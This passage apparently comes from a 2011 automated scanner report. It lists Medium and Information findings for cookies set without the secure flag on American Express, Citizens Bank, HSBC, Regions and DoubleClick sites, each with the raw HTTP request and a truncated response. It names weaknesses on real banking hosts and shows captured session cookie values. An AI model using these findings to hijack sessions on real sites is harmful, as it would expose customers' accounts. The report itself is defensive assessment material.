GET /dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do?vgnextoid=2621c0f7c5a4c110VgnVCM100000defaad94RCRD&inav=footer_fraud_protection_center HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:27 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=0000JPI55sd8KNdx8lYTMy7brTn:14qpqp8bv; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 38887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Fraud Protection Center</title>

...[SNIP]...

10.31. https://www212.americanexpress.com/dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do?vgnextoid=f25533fadb4ca110VgnVCM100000defaad94RCRD&vgnextchannel=9823f30b6b1ca110VgnVCM100000defaad94RCRD&us_nu=footer&source=footer_privacy_statement&inav=footer_privacy_statement HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:29 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=0000WljRBDsQJbtD5N0xFge7RAb:14qpqp2b7; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 55185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Internet Privacy Statement</titl
...[SNIP]...

10.32. https://www212.americanexpress.com/dsmlive/dsm/int/contactus/personalcards.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/int/contactus/personalcards.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/int/contactus/personalcards.do HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:33 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=00007MfRqAecrEgPk7WMB6uziyX:14qpqp2b7; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 13749


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


...[SNIP]...

10.33. https://www212.americanexpress.com/dsmlive/dsm/int/us/en/cmaproductspage.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www212.americanexpress.com
Path:   /dsmlive/dsm/int/us/en/cmaproductspage.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dsmlive/dsm/int/us/en/cmaproductspage.do?vgnextoid=bbf185df62df5210VgnVCM100000defaad94RCRD&source=footer_card_agreements&inav=footer_card_agreements HTTP/1.1
Host: www212.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:35 GMT
Server: IBM_HTTP_Server
Set-Cookie: dsmLive_JSESSIONID=0000Veb0ftG4-cYW9OOkY_veomE:14qpqp8bv; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 57019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>


<link
...[SNIP]...

10.34. https://www213.americanexpress.com/PowerLabsWeb/un/landingpage.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www213.americanexpress.com
Path:   /PowerLabsWeb/un/landingpage.htm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PowerLabsWeb/un/landingpage.htm HTTP/1.1
Host: www213.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:29 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742109740701; path=/; expires=Sun, 07-Feb-16 14:08:29 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000F5wGIYVCO3uWBH-xeaFC48P:129nma7r7;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81548


<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<META name="GENERATOR" content="IBM WebSphere Studio">
<META http-equiv="Content-Style-Ty
...[SNIP]...

10.35. https://www257.americanexpress.com/openhome/smallbusiness.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www257.americanexpress.com
Path:   /openhome/smallbusiness.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /openhome/smallbusiness.do?isFlash=true&inav=menu_business_openhome HTTP/1.1
Host: www257.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:37 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000akSHbW6x5an_FsyrXyIdKqc:14t0oisgo; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>
...[SNIP]...

10.36. https://www295.americanexpress.com/cards/home.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www295.americanexpress.com
Path:   /cards/home.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards/home.do HTTP/1.1
Host: www295.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:15:37 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000pVlv_8Ac9oFOFXNUhnegkUT:15bnmhi21; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 35522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "_http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<HEAD>
<meta http-equiv="X-UA-Compatible" content="IE=7" />

...[SNIP]...

10.37. https://www295.americanexpress.com/entertainmentaccess/home.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www295.americanexpress.com
Path:   /entertainmentaccess/home.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /entertainmentaccess/home.do HTTP/1.1
Host: www295.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:42 GMT
Server: IBM_HTTP_Server
Set-Cookie: ehub_JSESSIONID=0000X-wkKOi7UbYQfITKmK7Vy0B:1563unest; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 80026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>        
       
...[SNIP]...

10.38. https://www295.americanexpress.com/premium/credit-card-travel-insurance/home.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www295.americanexpress.com
Path:   /premium/credit-card-travel-insurance/home.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /premium/credit-card-travel-insurance/home.do HTTP/1.1
Host: www295.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:41 GMT
Server: IBM_HTTP_Server
Set-Cookie: fsea_JSESSIONID=0000NxGEMtoG1S-LUW_HX7nWKW2:156jli7te; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 36699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
   <head>        
       

   <meta http-equiv="expires" CONTENT="Thu, 15 Apr 2010 20
...[SNIP]...

10.39. https://www295.americanexpress.com/premium/credit-report-monitoring/enquiry.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www295.americanexpress.com
Path:   /premium/credit-report-monitoring/enquiry.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /premium/credit-report-monitoring/enquiry.do HTTP/1.1
Host: www295.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 14:08:40 GMT
Server: IBM_HTTP_Server
Location: https://www99.americanexpress.com/myca/usermgt/us/action?request_type=authreg_PPLogin&lgnsrc=PP&Face=en_US&REDIRECT_URL=https%3A%2F%2Fwww295.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenquiry.do%3FSC%3DL6L%26BC%3D0003%26PC%3D0001%26lgnsrc%3DPP%26Face%3Den_US
Content-Length: 0
Set-Cookie: fsea_JSESSIONID=0000DOIuP81S4K5SAYluhZy6Q1L:156jli7te; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/html
Content-Language: en-US


10.40. https://www3.citizensbankonline.com/efs/servlet/efs/default.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/default.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/default.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:39:33 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Content-Length: 290
Set-Cookie: JSESSIONID=0000yEc9ByzdGlyoF5hfZESfu7k:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2DB056D8929D0615DE87B03E11A74E
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


                                                       <script language="JavaScript">
       location.replace("http://www.citizensbank.com");
   </script>

<noframes><body bgcolor="#FFFFFF">
...[SNIP]...

10.41. https://www3.citizensbankonline.com/efs/servlet/efs/enter-password-help.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/enter-password-help.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/enter-password-help.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:39:31 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=00002paP1jy_NObgCyKpDHbHJ97:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2DAA4FD8929D0615DE87B01E30D37A
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 8526


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<title>Bank Message</title>
<style>
body {
background-color:#ffffff;
margin-left: 15px;
margin-top: 15px;

...[SNIP]...

10.42. https://www3.citizensbankonline.com/efs/servlet/efs/invalidate.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/invalidate.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/invalidate.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/efs/servlet/efs/login.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:37:47 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000tBooLP7LahSCClCMafF0ji2:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2C1327D8929D0615DE87B0C42ABB3D
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US


10.43. https://www3.citizensbankonline.com/efs/servlet/efs/login.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/login.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Connection: keep-alive
Referer: https://www3.citizensbankonline.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:36:01 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2A761CD8929D0615DE87B0FF9A505F
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 16267


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<head>
<script src="/efs/efs/jsp-ns/pm_fp.js"> </script>
<script>
<!--
function openPWWindow() {
MyWindow=
...[SNIP]...

10.44. https://www3.citizensbankonline.com/efs/servlet/efs/secure-login-help.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/secure-login-help.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/secure-login-help.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:39:32 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000ii7ijhH3ZBhJL4DYlqm5l6K:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2DAE08D8929D0615DE87B0B2BA8262
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 8785


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<title> Bank Message</title>
<style>
body {
background-color:#ffffff;
margin-left: 15px;
margin-top: 15
...[SNIP]...

10.45. https://www3.citizensbankonline.com/efs/servlet/efs/wait.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www3.citizensbankonline.com
Path:   /efs/servlet/efs/wait.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /efs/servlet/efs/wait.jsp HTTP/1.1
Host: www3.citizensbankonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 15:39:29 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Set-Cookie: JSESSIONID=0000jWQmN1NjoskCaW51LFHfStk:1475b8i2o; Path=/
x-wily-info: Clear guid=EC2DA2D9D8929D0615DE87B03C3756DD
x-wily-servlet: Encrypt1 2d/zAVDFrdY+MEWD9dZyiwAIm7vWc+o7dr8ct5rdigIfNgke0wNX4OwopA5Ho/UHpPBCo0A+u1iRytZGi/Q1CFQPEDJpVh6G8Uks8nlCt2c/qiltXkne2445BqQI6IIs
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8729


<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

   
   <head>
   <title>Processing...</ti
...[SNIP]...

10.46. https://ad.doubleclick.net/activity

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ad.doubleclick.net
Path:   /activity

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /activity;src=2549153;type=initi091;cat=landi727;ord=1;num= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://ad.doubleclick.net/activity;src=2549153;type=initi091;cat=landi727;ord=1;num=&_dc_ck=try
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Thu, 03 Feb 2011 13:32:53 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 03 Feb 2011 13:17:53 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


10.47. https://axptravel.americanexpress.com/consumertravel/travel.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://axptravel.americanexpress.com
Path:   /consumertravel/travel.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /consumertravel/travel.do?a=travel-offers&us_nu=subtab&inav=menu_travel_viewoffers HTTP/1.1
Host: axptravel.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:27 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=10.10.14.1-1296740607012467; Path=/; expires=Sun, 07-Feb-16 13:43:27 GMT; domain=.americanexpress.com, troute=w511; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/;domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000zLKMrS0j-ZgbX8l2Qda1jDt:15a6nqa6a; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-sx-duouswm-b=ffffffff97a3d14e45525d5f4f58455e445a4a42bbfd;path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Connection: close
Set-Cookie: sroute=386796042.58404.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 76587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>Tr
...[SNIP]...

10.48. https://easyview.us.hsbc.com/yodlee_index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://easyview.us.hsbc.com
Path:   /yodlee_index.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yodlee_index.html HTTP/1.1
Host: easyview.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:04:44 GMT
Vary: User-Agent
Set-Cookie: yut=172.17.12.125.48721296759884519; path=/
Last-Modified: Tue, 19 Jan 2010 08:24:12 GMT
ETag: "3a9d85-2a1b-4b556c2c"
Accept-Ranges: bytes
Content-Length: 10779
Connection: close
Content-Type: text/html

<html>
<head>
<meta name=description content="EasyView enables consumers to aggregate, manage, and access all their personal accounts - bank balances, investments, bills, email, travel reservations, s
...[SNIP]...

10.49. https://espanol.regions.com/regions/enes/24/_

Summary

Severity:   Information
Confidence:   Certain
Host:   https://espanol.regions.com
Path:   /regions/enes/24/_

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /regions/enes/24/_ HTTP/1.1
Host: espanol.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 03 Feb 2011 15:51:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Type: text/html;charset=iso-8859-1
Content-Length: 2741

<!DOCTYPE html PUBliC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="es">
<head>

<meta http-e
...[SNIP]...

10.50. https://expresstradelc.regions.com/icc

Summary

Severity:   Information
Confidence:   Certain
Host:   https://expresstradelc.regions.com
Path:   /icc

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /icc HTTP/1.1
Host: expresstradelc.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Location: http://expresstradelc.regions.com/icc/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:53:24 GMT
Set-Cookie: NSC_fyqsfttsjhiumd.sfhjpot.dpn-wjq=ffffffffaf130e8a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:27:20 GMT;path=/
Set-Cookie: rfaft2c1=CSxElP70L060EV8r+hGkjm8kVrgA1; Domain=.regions.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regions.com_%2F_wlf=TlNDX2Z5cXNmdHRzamhpdW1kLnNmaGpwb3QuZHBuLXdqcV9f?eqACuPgwQKiYA4fAAbwNJxQyR+gA&; Domain=.regions.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private
Set-Cookie: NSC_fyqsfttusbefmd.sfhjpot.dpn=ffffffffaf130d3645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:14:11 GMT;path=/;secure
Content-Length: 161

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://expresstradelc.regions.com/icc/">here</a></body>

